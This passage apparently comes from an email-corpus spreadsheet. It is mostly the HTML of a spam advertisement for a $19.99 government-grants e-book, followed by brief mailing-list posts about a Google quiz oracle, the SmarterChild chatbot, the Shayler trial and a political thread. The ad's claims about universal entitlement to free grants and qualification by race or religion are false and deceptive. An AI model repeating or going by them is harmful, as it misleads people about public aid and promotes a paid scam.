 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://www.2003marketing.com/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 If above link doesn't work, &lt;a href="http://www.2003marketing.com/grants.htm"&gt;Click Here
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 4793sXmk4-211VDMv8083PWKO2-994pZZJ6881Xl37
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Oracle of Google
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/12.html
 Date: 2002-09-12T17:08:46-08:00
 The Oracle of Google can answer multiple choice questions amazingly well ... 
 Who is the author of Perl?, What family lives next door to the Simpsons?. As 
 the author points out on the about page; this thing would be really useful in a 
 "Who Wants To Be a Millionaire" type contest. =)...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ActiveBuddy
</t>
  </si>
  <si>
    <t xml:space="preserve">Kind of interesting application of 'agent' technology.
 A mix of telnet and Eliza?
 (wonder if KnowNow needs this as a partner...)
 ==
 http://www.activebuddy.com/products/index.shtml
 ActiveBuddy, Inc. has developed patented technology for building and
 deploying interactive agents. ActiveBuddy's BuddyScript technology powers
 business solutions that leverage the functionality, convenience and appeal
 of instant messaging to provide an efficient and immediate means of
 communication with customers and constituents.
 ActiveBuddy technology is proven in the marketplace by the smash success of
 SmarterChild, ActiveBuddy's showcase interactive agent launched in June 2001
 and visited by over 8 million consumers in its first year of life.
 Interactive agents allow your customers and constituents to receive
 information and services in a natural, conversational interface.
 Software Products
 BuddyScriptT Server - an end-to-end software solution for deploying
 interactive agents. BuddyScript Server provides every component required to
 operate an interactive agent, including connectivity with the messaging
 network, message routing, data access, message formatting, user and session
 management, and detailed tracking. BuddyScript Server is offered in four
 configurations to meet your capacity needs. Its scaleable architecture
 supports virtually unlimited usage. More...
 ===
 Here is a sample conversation on (MSN Messenger with 'SmarterChild'):
 Mike says:
 how are you?
 SmarterChild says:
 Great thx! You?
 Mike says:
 Fine. What is the weather like in seattle?
 SmarterChild says:
 Current weather conditions for Seattle, WA:
 Currently: 57 F
 Condition: Few Clouds
 Real Feel: 57 F
 Dewpoint: 44
 Humidity: 62 %
 Visibility: 10 mi
 Wind: N/0 mph
 Next time, just type "weather seattle, wa."
 To get the forecast for Seattle, WA, just type "forecast."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ministers issue gag orders for MI5 trial
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622119,215/
 Date: 2002-10-07T03:52:57+01:00
 *UK latest: *Blunkett and Straw accused of trying to intimidate judge as 
 Shayler case starts today at Old Bailey.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Crony Capitalism (was RE: sed /s/United States/Roman Empire/g)
</t>
  </si>
  <si>
    <t xml:space="preserve">reminds me of Cheney during the VP debates, when he declared his wealth was
 not the product of government favors.
 http://www.ibiblio.org/pub/academic/communications/logs/Gulf-War/desert-stor
 m/07
 (good time to refresh our memories re iraq . . .)
 starting a debate on govt. contracts,
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Owen
 Byrne
 Sent: Sunday, September 22, 2002 11:04 AM
 To: Owen Byrne
 Cc: Gary Lawrence Murphy; Mr. FoRK; fork@example.com; Digital Bearer
 Settlement List
 Subject: Re: sed /s/United States/Roman Empire/g
 Owen Byrne wrote:
 &gt; R. A. Hettinga wrote:
 &gt;
 &gt;&gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt;&gt; Hash: SHA1
 &gt;&gt;
 &gt;&gt; At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote:
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;&gt; Cool --- I wasn't aware that the US had lifted it's population out
 &gt;&gt;&gt; of poverty! When did this happen? I wonder where the media gets the
 &gt;&gt;&gt; idea that the wealth gap is widening and deepening...
 &gt;&gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; All the world loves a smartass...
 &gt;&gt;
 &gt;&gt; :-).
 &gt;&gt;
 &gt;&gt; Seriously. Look at he life expectancy and human carrying capacity of
 &gt;&gt; this continent before the Europeans got here. Look at it now. Even
